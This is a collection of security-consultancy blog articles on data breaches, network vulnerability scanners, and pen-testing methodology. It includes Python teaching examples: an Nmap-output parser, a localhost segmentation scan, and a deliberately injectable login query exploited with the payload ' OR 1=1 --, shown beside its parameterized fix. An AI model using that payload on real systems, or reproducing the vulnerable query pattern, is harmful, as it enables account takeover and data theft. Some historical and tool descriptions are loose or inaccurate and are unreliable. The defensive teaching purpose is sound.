  • Continue to keep a close eye on your bank and financial accounts. You can also subscribe to transaction alerts via text and email; it is now policy for every bank to provide these services. It may seem that you are safe, but a cybercriminal has patience as a key virtue and may take months to make use of your stolen bank and financial information.
  • You might also contact the company where the data breach occurred when you made your transaction. They can provide you with information about the type of information that was leaked and the policies they have put in place to keep your personal details protected.

In the Long run

  • Many businesses and organisations have a policy of giving any customer affected by a data breach a free year of data monitoring. Find out from the organisation whether they have such a policy or offer such a service.
  • I still lay emphasis on the use of a secure password coupled with two-factor authentication, as explained in my previous articles, as a key means of online safety.

Data breaches continue to be among the most frequent incidents these days but, as I said, there are ways to stay alert and protected at all times. Luckily, for purchases you have made there are anti-fraud laws in place to ensure your safety. If you find yourself caught up in any of these data breaches, be diligent enough to monitor your accounts. Soutech web consultants are just the right professionals to handle these fears; if you in any way become a victim, you can contact us at SOUTECH. If you follow all the methods and tips mentioned in this article and report any suspicious fraudulent activity, you are as well informed as you can be.


Network Penetration Testing Services: Tools and Methodologies

In my previous articles I have discussed vulnerability analysis and penetration testing intensively, but I'll reiterate a few things to help buttress the points in this article.

Penetration testing plays a major role in the playbook of any security consultant, and it is the best indicator of how vulnerable a network is to attack. Compliance regimes such as PCI and HIPAA require vulnerability assessments, which also allow penetration testing to be performed in a smarter, more targeted way than simple port scans. Most importantly, vulnerability assessments are the bedrock for developing a proactive information security program, going beyond reactive techniques such as turning on firewalls and sealing loopholes as they are found. But know this: even if you know the basic security measures and follow them when installing and managing your websites and networks, that is never enough to discover and mitigate all the vulnerabilities by yourself.

Now let us understand what a network vulnerability assessment is as a component of penetration testing. Network penetration testing is a technique that involves reviewing and analyzing a network in order to discover any security loopholes and vulnerabilities. Network administrators and network security staff use it to evaluate their security architecture thoroughly and to defend the computer network against threats and vulnerabilities. It also helps them assess the strength of the network. The key objective of the technique is to discover vulnerabilities that may compromise the overall privacy, security and operation of a computer network.

Network penetration testing Methodology


1. Data and information gathering and project set-up

This involves:

  • Reviewing the project to obtain all assumptions
  • Listing and detailing the IP addresses to be scanned
  • Configuring the IDS and IPS to accept the scan's originating IP addresses
  • An optional scan using user credentials
  • Obtaining contact information for both parties
  • Scheduling the scans, including the time at which they are performed

2. Setting up the scanning tools

This step involves configuring all the vulnerability scanning tools for "safe mode".

3. Performing the vulnerability scan

This involves performing an in-depth scan of all the provided IP addresses and identifying any security weaknesses and vulnerabilities, including in user credentials where these have been scanned.

4. Research and Verification of vulnerabilities

This involves:

  • Verifying all the discovered vulnerabilities
  • Identifying false positives
  • Determining any potential impacts of the vulnerabilities being exploited
  • Prioritizing remediation efforts
  • Developing specific plans and recommendations for the remediation

5. Creating reports and project close-out

This involves:

  • Delivering the final and concluding reports
  • Holding the scheduled project-conclusion teleconference
  • Ensuring a full understanding of the recommended remediation actions
  • Facilitating knowledge transfer in an effective form

Network Vulnerability Assessment Tools

Vulnerability scanners play a very critical role in carrying out an automated security audit in any organization. They can scan the website, network and other internal systems for thousands of security risks and automatically prioritize them alongside the right patches; some can apply the patches automatically.

Scanning websites is an entirely different ballgame from network scans. In the case of websites, the scope of the scan ranges from Layer 2 to 7, considering the intrusiveness of the latest vulnerabilities. The correct approach for scanning websites starts from Web-level access, right up to scanning all back-end components such as databases. While most Web security scanners are automated, there could be a need for manual scripting, based on the situation.

1. OpenVAS: This is short for Open Vulnerability Assessment System, a free network security tool with most of its components licensed under the GNU General Public License (GPL). The tool is very effective at scanning for thousands of vulnerabilities and supports concurrent and scheduled scans and tasks. Its main component is available as Linux packages and as downloadable virtual appliances for testing and evaluation. OpenVAS does not run on Windows, but it offers clients for Windows platforms. It runs mainly on Linux and receives daily updates to its feed of over 33,000 network vulnerability tests.

OpenVAS has a manager that controls its intelligence; it is command-line based, with full daemon services for user management and feed management. It is not quick or easy to install, but it has one of the richest feature sets in IT security scanning.

2. Retina CS Community: This is a vulnerability scanning and patching tool for Microsoft and most third-party applications such as Firefox and Adobe. It can scan for vulnerabilities in mobile devices, virtualized applications, servers, web applications and private clouds as well, and it identifies missing patches and configuration issues. A component called Retina Network Community must be installed before the Retina CS Community software itself. It runs on Windows Server 2008 or later with Microsoft SQL Server 2008 or later, requires .NET Framework 3.5 and needs IIS enabled.

It gives you the option of choosing from a variety of scans and reporting templates and of specifying IP address ranges. You can also provide any credentials required for the scanned assets, and reports come out in a ready, organized format, including email alerts. Most small businesses, however, may find its system requirements stringent since it requires Windows Server.

3. Microsoft Baseline Security Analyzer (MBSA): This tool performs both local and remote scans of Windows servers and desktops. It is very efficient because it can identify missing service packs, security patches and common security misconfigurations. Supported platforms are Windows XP, Windows 8 and 8.1, Windows Server 2012 and Windows Server 2012 R2. It is an easy-to-understand, straightforward tool. You can scan a single Windows machine by name or IP address, specify a range of IP addresses, or choose a domain, and you can choose what to check: Windows, IIS or SQL administrative vulnerabilities, Windows updates or weak passwords.

5. SecureCheq: This tool performs local scans on both Windows desktops and servers and identifies many insecure advanced Windows settings as defined by standards such as COBIT, ISO and CIS. It deals mainly with common configuration errors related to OS hardening, communication security, data protection, audit logs and user account activity. The free version performs fewer than 24 checks, about a quarter of what the full version checks. SecureCheq is a simple tool that lists all the checked settings with passed or failed results. Although it is easy to use and can check advanced configuration settings, it cannot dig deep into general Windows vulnerabilities or network-based threats. It does, however, complement MBSA well: scan for basic threats with MBSA and then perform a follow-up scan with SecureCheq.

6. Qualys FreeScan: This tool performs about 10 free scans of URLs and IPs of local servers and machines on the internet. It can be downloaded from the Qualys web portal and installed and run on a virtual machine to scan internal networks. It can scan for SSL issues and vulnerabilities in the related network services.

At first it may seem to be an online tool that scans over the internet, but if you enter a local IP address it prompts you to download a VMware or VirtualBox image to your system. This allows you to scan local networks and gives an interactive report of the threats and patches.

7. Wireshark: Wireshark, previously called Ethereal, is one of the most popular tools for network vulnerability testing and assessment because it gives you a clear picture of what is happening on your network. It works in promiscuous mode to capture all the traffic on a broadcast domain. It has customizable filters that can be configured to capture specific traffic, such as communication between two IP addresses or UDP-based DNS queries on that network.

The captured data can be dumped into a capture file for later review. It can also be used to look for stray IP addresses, unnecessary packet drops, spoofed data packets and any suspicious single IP address. Although Wireshark gives a clearer and broader picture of network activity, it has no intelligence of its own and should therefore be used as a data provider.

8. Nmap: This has remained one of the most popular scanning tools for over a decade. It can craft packets and perform scans at a granular TCP level, such as ACK and SYN scans. Some of the characteristics of this tool include:

  • Built-in signature algorithms that guess the OS and its version from the TCP handshake
  • It can detect remote devices on the network, including firewalls and routers and their models
  • It can check which ports are open and running and which could be exploited in a simulated attack
  • It gives results in plain text and verbose formats
  • It can be scripted to automate routine tasks and obtain evidence for audit reports
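As an added example (not from the article or from the Nmap project), the script below shows step 4 of the methodology above applied to Nmap output: it parses constructed sample lines in Nmap's grepable (-oG) format, compares the open ports with an approved-services baseline, and orders the findings for remediation. The sample hosts, the baseline and the high-risk service list are assumptions.

```python
"""Turn Nmap grepable (-oG) output into prioritized audit evidence (added example)."""
import re

# Constructed sample in Nmap grepable format for two scanned hosts.
NMAP_GREPABLE = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 192.0.2.10 (web01)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (997)
Host: 192.0.2.20 (db01)\tPorts: 22/open/tcp//ssh///, 23/open/tcp//telnet///, 3306/open/tcp//mysql///, 111/filtered/tcp//rpcbind///\tIgnored State: closed (996)
# Nmap done (constructed sample)
"""

# Constructed: services the organization has approved per host (from the project set-up step).
APPROVED_SERVICES = {
    "192.0.2.10": {22, 80, 443},
    "192.0.2.20": {22, 3306},
}

# Assumption: cleartext remote-access services rate "high"; everything else unapproved is "medium".
HIGH_RISK_SERVICES = {"telnet", "ftp", "rsh", "rlogin"}

# Host line layout: "Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/<owner>/<service>/..., ...\t..."
HOST_RE = re.compile(r"^Host: (\S+) \((.*?)\)\tPorts: (.*?)\t")


def parse_grepable(text):
    """Return {ip: {"name": str, "ports": [{"port", "state", "proto", "service"}]}}."""
    hosts = {}
    for line in text.splitlines():
        match = HOST_RE.match(line)
        if not match:  # comment lines and hosts with no port data
            continue
        ip, name, ports_field = match.groups()
        ports = []
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            ports.append({
                "port": int(fields[0]),
                "state": fields[1],
                "proto": fields[2],
                "service": fields[4],
            })
        hosts[ip] = {"name": name, "ports": ports}
    return hosts


def prioritize(hosts, approved):
    """Flag open ports outside the baseline; mark filtered ports for manual verification."""
    findings = []
    for ip, info in hosts.items():
        for p in info["ports"]:
            if p["state"] == "filtered":
                # A firewall answered for the port; verify by hand before reporting it.
                findings.append({"host": ip, "port": p["port"], "service": p["service"],
                                 "severity": "verify", "reason": "filtered, confirm manually"})
                continue
            if p["state"] != "open" or p["port"] in approved.get(ip, set()):
                continue
            severity = "high" if p["service"] in HIGH_RISK_SERVICES else "medium"
            findings.append({"host": ip, "port": p["port"], "service": p["service"],
                             "severity": severity, "reason": "open port not in approved baseline"})
    order = {"high": 0, "medium": 1, "verify": 2}
    return sorted(findings, key=lambda f: (order[f["severity"]], f["host"], f["port"]))


def evidence_report(findings):
    """Render findings as plain-text lines suitable for an audit report appendix."""
    return [f"[{f['severity'].upper()}] {f['host']}:{f['port']}/{f['service']} - {f['reason']}"
            for f in findings]


if __name__ == "__main__":
    for line in evidence_report(prioritize(parse_grepable(NMAP_GREPABLE), APPROVED_SERVICES)):
        print(line)
```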

9. Metasploit: Metasploit is a tool that comes into play after scanning and sniffing have been done. It provides the following capabilities:

  • It is a rigorous tool for performing scans against a set of IP addresses.
  • It can be used for anti-forensics.
  • Programmers can write exploit code for vulnerabilities and test in Metasploit whether it works.
  • It is a commercially available tool for performing virus attacks.

10. Aircrack: This is a wireless network scanning tool that acts as a sniffer, packet crafter and decoder. It targets a wireless network by capturing packet traffic to gather information about the underlying encryption; a decryptor then brute-forces the capture file to recover passwords. Aircrack is included in Kali Linux, which is the preferred platform for it.

11. Nikto: This is an interactive open source tool for scanning websites, and it supports both HTTPS and HTTP. Nikto works by:

  • Crawling a website as a human would, in a short amount of time
  • Using a technique known as mutation to create combinations of various HTTP tests to perform an attack
  • Finding critical loopholes such as improper cookie handling, XSS errors and upload misconfigurations
  • Dumping all its findings in verbose mode, which also helps in learning more about the vulnerabilities in a website

Care should be taken when interpreting Nikto logs, because it reports a great many items and can raise false alarms.

12. Samurai framework: This is used for deep-diving after Nikto has done a baseline check. It is a powerful scanning utility that can target a specific set of vulnerabilities. It is a pure penetration testing toolkit built around other penetration tools, such as WebScarab for HTTP mapping.

13. SQLmap: This first-generation tool is capable of exploiting SQL injection errors and can also take over the database server. It performs speedy fingerprinting of the database to identify the underlying OS and file system and fetch data from the server.

Note that a regularly scheduled network vulnerability scan can help an organization identify loopholes and weaknesses in its network before any cybercriminal can attack. The aim of a network vulnerability scan is to identify weaknesses in the devices on your network without compromising those systems. Therefore, conduct a periodic network vulnerability scan in order to discover and mitigate any possible weaknesses on your network before they can be exploited.

Why do you need the services of a Network Penetration Tester?

A network penetration tester is specifically trained with the expertise to conduct penetration testing and network assessments effectively. Note that if a penetration test is improperly conducted it could be detrimental to your organization and its daily operations. Some of the skills a network security specialist has are:

  • Data breach prevention
  • Application security
  • Security control testing
  • Gap analysis maintenance
  • Compliance testing and analysis

Who do you contact?

We offer a range of services, from certifications and training in vulnerability and penetration testing to many more courses. We at Soutech Web Consults have a team of professionals who can not only train you and your staff in vulnerability and penetration testing, an essential part of cyber security, but also conduct the tests for you. Visit us at Soutech Web Consults or subscribe to our website to find out how we can help your organization and your business mitigate any form of network vulnerability by implementing our test processes and technologies.

All you need to know about Penetration Testing: Soutech Ventures

Penetration which is colloquially referred to as pen test is a simulated attack that is being performed on a computer system or its network infrastructure with permissions from management to probe for security vulnerabilities, and a potential means of gaining access to data and other features on the system.

Penetration testing helps one find out how vulnerable a system is to attack, whether the defence mechanisms in place are sufficient, and which of the defence mechanisms or techniques employed can be defeated. A typical penetration test focuses on finding vulnerabilities within the scope of the approved activity for a given engagement.

Security testing can never prove the absence of security flaws in a system, but it can certainly prove their presence.

Brief History of Penetration Testing

Since the mid-1960s, for more than 50 years, as networks grew more sophisticated, white-hat hackers have been working to keep computer systems protected from unauthorized access. They understood that if hackers gained access to their systems, they could destroy information networks as well as steal information. As computers gained the ability to share data across communication lines, the challenge of protecting that information grew: if these lines were broken into, the data could be altered, held or stolen.

As early as 1965, computer security experts warned government and business that, because of the increasing capability of computers to share information and exchange vital data across communication lines, attempts to penetrate those lines during data exchange were inevitable. In 1967, at the annual Joint Computer Conference, which had over 15,000 computer security experts in attendance, there were serious deliberations that computer communication lines could be penetrated by hackers. They coined the term penetration, which has since become a major challenge in computer communication.

This meeting brought about the idea of actually testing systems and networks, to increase their integrity as computer networks expanded. The RAND Corporation, which had identified a major threat to communications between networked computers, worked with the Advanced Research Projects Agency (ARPA) in the US to produce a report known as the Ware Report after its lead author, Willis Ware. The Ware Report discussed this security issue and proposed policies to serve as countermeasures against security breaches.

From this report, government and organizations started forming teams whose sole responsibility was to find weaknesses and vulnerabilities in computer networks and to devise measures to protect the systems from unauthorized or unethical hacking or penetration.

Today, there are numerous specialized options available for performing penetration testing. Many of these distributions include tools with a range of features for testing the security of operating systems, networks and applications. For example, Kali Linux can be used for penetration testing and digital forensics. It ships with standard tools such as Burp Suite, Nmap, Aircrack-ng, Kismet, Wireshark, the Metasploit Framework and John the Ripper. That a single distribution contains all these sophisticated tools, and many more, shows how sophisticated today's technology has become and how many attackers are finding ways to create problems for computer-driven networks and computing environments, most especially the internet.

Objectives of Penetration Testing

The objectives of a thorough pen test include:

  • Determining how an attacker can find loopholes to gain unlawful access to system assets, in a way that harms the fundamental security of the system, its logs and its files.
  • Confirming that all applicable controls, such as vulnerability management methodologies and the segmentation required for the proper functioning of the system, are in place.

Types of Penetration Testing

  1. Black box penetration testing: Also referred to as blind testing. Here, the client does not give the pen tester any prior information about the system architecture. Because the tester starts from nothing, this most closely mimics an outside attacker, but it can require more money, time and resources to carry out, and the lack of information may limit how much of the system the tester gets to assess.
  2. White box penetration testing: Here, the client provides the pen tester with comprehensive and complete details of the network and how it is used.
  3. Grey box penetration testing: The client provides incomplete or partial information about the system and network.

Stages of Penetration Testing

There are basically 5 stages of a penetration test.

1. Reconnaissance and planning: This stage involves gathering intelligence, such as network ranges, mail servers and domain names, in a bid to understand how the target system works and the potential vulnerabilities it faces.

It also involves a thorough definition of the scope and goals of the penetration test, including the systems to be addressed and the testing methods to be deployed.

2. Scanning: This stage builds an in-depth understanding of how the target applications will respond to intrusion attempts. Scanning can be performed in the following ways:

  • Static analysis: This involves a careful inspection of the application's code, without running it, to estimate how it will behave when it is run. Static analysis tools can scan the entire code base in a single pass.
  • Dynamic analysis: This involves inspecting the application while it is running. It is a more practical approach to scanning in that it gives a real-time view of the application's behaviour.

3. Gaining Access: In this stage, the pen tester uses web application attack techniques such as SQL injection, cross-site scripting (XSS) and backdoors to uncover the vulnerabilities on the target system. To understand the damage they could cause, the tester then tries to exploit the vulnerabilities discovered by intercepting traffic, stealing data, escalating privileges and so on.

4. Maintaining Access: This stage aims at achieving a persistent presence in the exploited system using the vulnerabilities found. It imitates advanced persistent threats, which can remain on a system for months and stay logged in to monitor changes, enhancements and any new information loaded onto the system.

5. Results and Analysis: In this stage, all the results obtained from the penetration test are compiled comprehensively and in detail. This includes:

  • All the vulnerabilities that were exploited
  • All sensitive data that was accessed
  • The amount of time the tester maintained access without being detected

Security personnel then analyse the results in order to reconfigure the organization's WAF settings where necessary and to address any other application security flaws. This is done to patch all the vulnerabilities found and to protect information against future attacks.

Classification of Penetration Testing

1. External Penetration Testing: An external penetration test targets the assets owned by an organization that are accessible on the internet. Examples of such assets are:

  • The organization's website
  • Domain name servers
  • Email servers
  • Web applications

The major goal of an external pen test is to gain access and extract data.

2. Internal Penetration Testing: This mimics an attacker who already has a foothold inside the network launching an attack from there to find vulnerabilities or loopholes.

It involves examining the IT systems of the internal network for vulnerabilities that can affect confidentiality, integrity and availability, thereby giving the organisation the clues it needs to take steps to address them.

Penetration Testing Services

I will describe 4 distinct penetration testing service offerings that we can provide you

  1. Vulnerability Scanning: Vulnerability scanning is a transparent and mature offering; the biggest decision for a provider is whether to resell a scanning service or to buy a scanner that can be used internally on clients' systems and networks. Most regulations require scanning, which is the first and easiest step toward security assurance, because every regulated customer needs to scan.
  2. Penetration testing of Infrastructure: This uses tools such as Metasploit or Core Impact to run live exploits. Because live ammunition is used, the test has to be orchestrated with the client so that disruption during testing is minimized. The pen tester should test all externally visible IP addresses, because that is what attackers go after to penetrate the system and network. The tester should also plug into the conference-room network, which is often one of the softest parts of a customer's defences.
  3. Penetration of Applications: This is a very important step that involves attempting to break into the applications, because so many attacks are aimed directly at applications. Web application scanners such as HP WebInspect and IBM AppScan can be employed, but the tester can also find ways to exploit errors in the application logic. Little withstands a skilled application tester: once an application is compromised, direct access to the database holding the valuable data is often easy. If the tester can reach the database, the customer's system is effectively owned, and the findings can then be used to close every hole an attacker would use.
  4. User Testing: This part of the penetration test is always fun for penetration testers, because they get to see how easily most users can be fooled. The test may involve sending fake email messages to customer service representatives in a bid to gather information that can be used to penetrate the customer's facilities. Testers even drop thumb drives in the parking lot and watch for people who plug them in. Social engineering is one of the key ways of gathering information and should never be underestimated; it can be used on the client to catch them off guard.
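
The Gaining Access stage described earlier and the application testing in item 3 above both turn on the same thing: user input reaching the database as SQL. The block below is an added example, not code from this article or from the scanners it names (WebInspect, AppScan). The schema, the two user rows and the login functions are constructed for the demonstration; what a tester actually looks for is the query-building pattern. It shows the vulnerable query, the payload that defeats it, and the parameterized fix side by side.

```python
"""A login query open to SQL injection, the payload that defeats it, and the fix.

Added example, not code from the article or from the scanners it names.
The schema, the two users and the login functions are constructed for the
demonstration; only the query-building pattern is what a tester looks for.
"""
import hashlib
import sqlite3


def _hash(password: str) -> str:
    # SHA-256 keeps the example short; a real application stores passwords
    # with a slow, salted hash (bcrypt, scrypt or argon2), which does not
    # change the injection issue below.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", _hash("correct horse"), "admin"),
         ("bob", _hash("hunter2"), "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the query by string concatenation, so the username is parsed
    as SQL.  Returns the user's role on success, None otherwise."""
    query = ("SELECT role FROM users WHERE username = '" + username
             + "' AND pw_hash = '" + _hash(password) + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username: str, password: str):
    """Same lookup with a parameterized query: the values travel separately
    from the SQL text, so quotes in the input remain data."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND pw_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] if row else None


# Classic payload: close the string literal, add an always-true condition,
# and turn the rest of the statement (the password check) into a comment.
# The resulting WHERE clause matches every row, and fetchone() returns the
# first one, here the admin account.
PAYLOAD = "' OR 1=1 --"


def demo():
    conn = make_db()
    return {
        "honest_vulnerable": login_vulnerable(conn, "bob", "hunter2"),
        "injected_vulnerable": login_vulnerable(conn, PAYLOAD, "anything"),
        "honest_hardened": login_hardened(conn, "bob", "hunter2"),
        "injected_hardened": login_hardened(conn, PAYLOAD, "anything"),
    }


if __name__ == "__main__":
    for case, role in demo().items():
        print(f"{case:20s} -> {role}")
```

Run it directly to see all four outcomes: against the concatenated query the injected input logs in as the first row in the table (the admin) without knowing any password, while the parameterized query treats the same input as a literal username and rejects it. In a real test the same injection point is usually also a route to reading arbitrary tables, which is the "direct access to the database" mentioned above and why such a finding is rated critical.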

Standards for Penetration Testing Methodologies

There are many accepted industry methodologies that can guide the pen tester through a test:

  • Open Source Security Testing Methodology Manual (OSSTMM)
  • OWASP Testing Guide
  • NIST Special Publication 800-115, Technical Guide to Information Security Testing and Assessment
  • Penetration Testing Execution Standard (PTES)
  • Penetration Testing Framework

These frameworks set standards that any penetration testing activity should follow; they should be adhered to and used to guide the pen tester whenever necessary.

A typical penetration test is detailed and must be carried out in an organized fashion, because organisational data and assets are very important and delicate things to handle; therefore there is a need for an organised team of professionals to handle your penetration testing services.

We at SOUTECH Web Consults are the perfect consulting firm to carry out your penetration testing. We have the professional staff and the team to conduct a detailed and professional penetration test. Subscribe to our services today.

Performing a Detailed Penetration Testing: Soutech Ventures

Pen tests, as we already know, are intended to identify and confirm actual, exploitable security weaknesses and to report such issues to management. This lets an organization strike a balance between business needs and good network security, ensuring the smooth operation of the business.

To reiterate, as this is a follow-up to my basics on penetration testing: penetration testing, colloquially called a pen test, is an ethical hacking method used to perform security testing on an organization's computer network. It involves a number of methodologies, which I explained in my previous write-up, designed to explore a network for potential known vulnerabilities and to test whether they are real. A properly performed penetration test allows a network professional to fix issues within the network, improving network security and providing the protection the entire network needs against future cyber-attacks and intrusions.

The terms vulnerability assessment and penetration testing are often confused, so I will attempt to differentiate them, because they mean different things.

A pen test, with the legal permission of the owner, actively exploits the network; a vulnerability assessment evaluates the network, its systems and services for potential security problems. A pen test performs simulated attacks, whereas a vulnerability assessment is pure analysis and vetting of an organization's network for vulnerabilities. Note that in a vulnerability assessment no attack is launched.

The Qualifications of a Penetration Tester

Penetration testing can be performed by a qualified third party as long as they are organizationally independent, that is, organizationally separate from the management of the client or of the target system. For example, under PCI DSS, a third-party firm that is involved in the installation, maintenance or support of the target systems cannot also conduct the penetration test of those systems.

The following guidelines can be useful when choosing a good and qualified penetration tester.

Certifications for a penetration tester: The certifications a penetration tester holds are a useful indication of their level of competence and skill. While these certifications are not required, they indicate a common body of knowledge. These are a few of the many certifications a penetration tester can hold:

  • Certified Ethical Hacker (CEH)
  • Offensive Security Certified Professional (OSCP)
  • Global Information Assurance Certification (GIAC) certifications
  • Certified Information Systems Security Professional (CISSP)
  • GIAC Penetration Tester (GPEN)
  • EC-Council Certified Security Analyst (ECSA)
  • Licensed Penetration Tester (LPT)
  • GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)

Always remember that before any test begins, all parties (the organization, the pen tester and, where applicable, the assessor) should be involved. They must all be aware of the type of test being performed (external, internal, network layer or application layer), how the test will be performed, and what the target is.

Steps to Perform a Detailed Penetration Testing

1. Scoping of the organization: It is the organization's responsibility to adequately define its critical systems. The normal recommendation is that the organization works hand in hand with the pen tester wherever applicable. The assessor also plays a major role here, verifying that no components are overlooked and determining whether additional systems should be included in the scope. The scope of the penetration test should include the critical systems, the access points and the methods of segmentation.

2. Documentation: All documentation for components within the scope should be made available to the tester whenever necessary. Documents include:

  • Application interface documentation
  • Guides to the implementation

This will help the tester understand the functionality of the system. Other information the organization should supply the tester includes:

  • Network diagram showing all network segments
  • Data flow diagram
  • Detailed list of all services and ports exposed at the perimeter
  • List of isolated network segments

[Figure: a typical network diagram showing the network architecture]

The pen tester uses all this information to assess and identify unexpected attack vectors and any insufficient authentication controls.

3. Rules of Engagement: Before any test begins, it is very important to agree on and document the conditions and terms under which the test will be performed and the extent of exploitation allowed. This gives the pen tester authority over the test environment and makes sure the organization understands the test and what to expect from it. The following should be considered as rules of engagement:

  • In which time window will the test be performed?
  • Are there known issues in the system, or issues with automated scanning? If so, will such systems still be tested?
  • What are the preferred methods of communication about the scope and about any issues encountered in the course of the test?
  • Are there security controls that could detect the testing, and should they be left in place?
  • Are there passwords or other sensitive data that may be exposed during the test?
  • Could the equipment to be used by the tester pose a threat to the organization's systems?
  • Should the systems be updated (OS, service packs and patches) before the test?
  • Should the tester provide all the IP addresses from which the test will originate?
  • What steps should the tester take on detecting a flaw or loophole?
  • Will the tester retain any data obtained during the test?

4. Third-party Hosted/Cloud environments: Where systems are hosted by a third party or in the cloud, the following should be added to the rules of engagement:

  • Whether the service-level agreement requires approval from the third party before testing commences.
  • Web management portals provided by the third party to manage the infrastructure should not be included unless explicitly noted in the scope.

5. Criteria for success: A pen test simulates a real-world attack with the aim of identifying how far an attacker could go in penetrating the systems. Defining the success criteria for the pen test allows the entity to set limits on it. Success criteria should be included in the rules of engagement and may include:

  • Direct observation of restricted services or data, showing that access controls are absent or bypassed
  • Compromise of the domain used by legitimate users

6. Review of past vulnerabilities and threats: This involves reviewing and considering all the threats and vulnerabilities encountered in the last 12 months. It is a historical look into the organization's environment since the last assessment was performed, and it gives valuable insight into how to handle current vulnerabilities. Depending on whether a white box, grey box or black box test is being performed, some of this information may not be shared with the tester. The review should cover:

  • Vulnerabilities discovered by the organization that have not been resolved within the expected time
  • Compensating controls that mitigate the discovered vulnerabilities
  • Upgrades or deployments that are in progress
  • Threats and vulnerabilities that may have led to a data breach
  • Remediation of findings from previous years' pen tests

7. Segmentation: Segmentation testing uses the techniques of the initial stage of a network penetration test, such as port scans and host discovery, to verify that isolated LANs cannot reach the critical systems, such as the database. Testing each unique segment confirms that the security controls are working as intended. From each segment the tester has access to, the pen tester should determine which parts of the organization are reachable and report any unexpected access so that it can be restricted.
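
Segmentation testing as described in step 7, and the scanning stage of a pen test more generally, comes down to a connect scan from a given network position compared with what the network diagram says should be reachable from there. The block below is an added example, not the article's own tooling and not a replacement for Nmap. It performs a TCP connect scan with banner grabbing against constructed listeners on 127.0.0.1, so that it runs offline, and reports every host and port whose observed state differs from the agreed policy. The hosts, ports, banners and the "guest LAN" policy are all constructed; in an engagement they come from the scoping documents in step 2.

```python
"""Segmentation check: TCP connect scan with banner grab, compared to a policy.

Added example, not the article's own tooling and not a replacement for Nmap.
Everything here runs against 127.0.0.1: the "services" are constructed
listeners started in background threads so the scan can be run offline.
In a real engagement the hosts, ports and the policy come from the network
diagram and the scoping documents.
"""
import socket
import threading


def start_banner_service(banner: bytes):
    """Start a throwaway listener on 127.0.0.1 that greets each client with
    `banner` and hangs up (like an SSH, FTP or SMTP daemon that speaks first).
    Returns (listening_socket, port); close the socket to stop the service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))       # port 0: the OS picks a free port
    srv.listen(5)
    srv.settimeout(0.2)              # lets the accept loop notice a close

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:          # listening socket closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def reserve_closed_port() -> int:
    """Return a port that is currently closed on 127.0.0.1 (bind, then release)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def scan_port(host: str, port: int, timeout: float = 0.5):
    """TCP connect scan of one port. Returns (is_open, banner_text)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:              # refused, filtered (timeout) or unreachable
            return False, ""
        try:
            banner = s.recv(1024)    # services that speak first identify themselves
        except OSError:
            banner = b""
    return True, banner.decode("ascii", errors="replace").strip()


def check_segmentation(policy):
    """policy: list of (host, port, expected) with expected 'open' or 'closed',
    describing what this test position should be able to reach.
    Returns the violations as (host, port, expected, observed, banner)."""
    violations = []
    for host, port, expected in policy:
        is_open, banner = scan_port(host, port)
        observed = "open" if is_open else "closed"
        if observed != expected:
            violations.append((host, port, expected, observed, banner))
    return violations


def run_demo():
    """Constructed scenario, scanned from an isolated guest LAN position:
    the mail relay must be reachable, the database tier must not be.
    The database listener is deliberately left reachable to show a violation."""
    mail_srv, mail_port = start_banner_service(b"220 relay.example.test ESMTP\r\n")
    db_srv, db_port = start_banner_service(b"DB-SERVICE 1.0 ready\r\n")
    admin_port = reserve_closed_port()  # correctly filtered: nothing listens
    policy = [
        ("127.0.0.1", mail_port, "open"),     # guest LAN -> mail relay: allowed
        ("127.0.0.1", admin_port, "closed"),  # guest LAN -> admin tier: blocked
        ("127.0.0.1", db_port, "closed"),     # guest LAN -> database: must be blocked
    ]
    try:
        return check_segmentation(policy)
    finally:
        mail_srv.close()
        db_srv.close()


if __name__ == "__main__":
    for host, port, expected, observed, banner in run_demo():
        print(f"VIOLATION {host}:{port} expected {expected}, observed {observed}"
              f" banner={banner!r}")
```

The policy list is the part worth keeping. A segmentation test is only meaningful when the expected state of each path is written down before scanning, so that an unexpectedly reachable database port shows up as a violation rather than as just another open port. Run the scan from every isolated segment, not just one, and keep the banners: they are what a vulnerability scan later matches against known-vulnerable versions.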

8. Post Exploitation: This means taking action after the initial compromise of a system. It refers to the methodical use of pivoting techniques and privilege escalation to establish a new source of attack from a vantage point inside the system, in order to gain access to further network resources.

9. Post-Engagement: The following activities should be carried out after the engagement or testing has been performed:

  • Remediation best practices
  • Retesting all the identified vulnerabilities

10. Cleaning up the work environment: After the pen test has been performed, a thorough cleanup of the working environment is necessary. The tester documents and informs the organization of any alterations made to the environment. These include, but are not limited to:

  • Tools installed by the tester on the organization's systems
  • Accounts created during the assessment
  • Passwords changed for accounts
  • Any additional documents or files left behind that do not belong to the organization

11. Reporting and Documentation: The report helps the organization in its efforts to improve its security posture and to identify areas vulnerable to threats. A report should be structured so that it clearly communicates what was tested, how it was carried out and what was found. The report should cover the following:

  • The identified vulnerabilities
  • Any firewall misconfigurations
  • Credentials that were obtained through manipulation of the web application

Penetration testing is a learning experience for everyone in the organization who is involved in it, as well as for the tester. The testers discover what works and what does not against the entity being tested, and learn how to adapt to the customer's defences. The client organization learns what it should have known and done, what is less effective, and what is applicable. The pen tester then helps pick up the pieces and builds a strong, long-term relationship with the client.

